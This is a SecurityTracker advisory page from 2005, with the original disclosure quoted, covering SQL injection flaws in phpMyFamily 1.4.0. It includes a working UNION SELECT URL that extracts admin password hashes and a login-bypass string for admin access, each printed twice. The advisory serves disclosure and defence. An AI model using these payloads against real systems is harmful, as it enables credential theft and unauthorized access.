SecurityTracker.com
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 


Category:   Application (Generic)  >   phpmyfamily Vendors:   phpmyfamily.net
phpmyfamily Input Validation Holes Let Remote Users Inject SQL Commands
SecurityTracker Alert ID:  1013493
SecurityTracker URL:  http://securitytracker.com/id/1013493
CVE Reference:   GENERIC-MAP-NOMATCH   (Links to External Site)
Date:  Mar 21 2005
Impact:   Disclosure of authentication information, Disclosure of system information, Disclosure of user information, Modification of user information, User access via network
Exploit Included:  Yes  
Version(s): 1.4.0
Description:   An input validation vulnerability was reported in phpmyfamily. A remote user can inject SQL commands.

Several scripts do not properly validate user-supplied input. A remote user can supply a specially crafted URL to execute SQL commands on the underlying database.

The 'people.php', 'track.php', 'edit.php', 'document.php', 'census.php', and 'passthru.php' scripts are vulnerable. Other scripts may also be affected.

A demonstration exploit URL is provided:

http://[target]/[path]/people.php?person=00002'
%20UNION%20SELECT%20NULL,password,NULL,username,NULL,NULL,NULL,NULL,NUL
L,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL%20FROM%20family_users%20%20WH
ERE%20admin='Y'%20LIMIT%201,1/*

A remote user can supply the following login username to authenticate to the application with administrative privileges:

' OR 'a'='a' AND admin='Y'/*

The vendor has been notified.

ADZ Security Team reported this vulnerability.

Impact:   A remote user can supply a specially crafted URL to execute SQL commands on the underlying database.
Solution:   No solution was available at the time of this entry.
Vendor URL:  www.phpmyfamily.net/ (Links to External Site)
Cause:   Input validation error
Underlying OS:  Linux (Any), UNIX (Any), Windows (Any)

Message History:   This archive entry has one or more follow-up message(s) listed below.
Mar 25 2005 (Vendor Issues Fix) phpmyfamily Input Validation Holes Let Remote Users Inject SQL Commands
A fix is available.



 Source Message Contents

Subject:  phpMyFamily 1.4.0 SQL vulnerabilities


ADZ Security Team
===================
Info

Program: phpMyFamily
Version: 1.4.0
Modules: people.php, track.php, edit.php, document.php, census.php,
passthru.php and other..
Bug type: SQL Injection
Vendor site: http://www.phpmyfamily.net/
Vendor Informed: Yes
===================
Bug Info

Basic SQL-Injection in  of this engine

Examples/PoC:

http://[host]/[path]/people.php?person=00002'
%20UNION%20SELECT%20NULL,password,NULL,username,NULL,NULL,NULL,NULL,NUL
L,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL%20FROM%20family_users%20%20WH
ERE%20admin='Y'%20LIMIT%201,1/* - This selects first admin with login &
password hash :)

Login as admin without pass:

Login: "' OR 'a'='a' AND admin='Y'/*" (without quotes)
Password: (empty)


===================
Contact

ADZ Security Team
URL: http://adz.void.ru/
IRC: #adz @ QuakeNet
MAIL: kre0n@mail.ru, adz.kreon@gmail.com (for non-russian users)

 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2019, SecurityGlobal.net LLC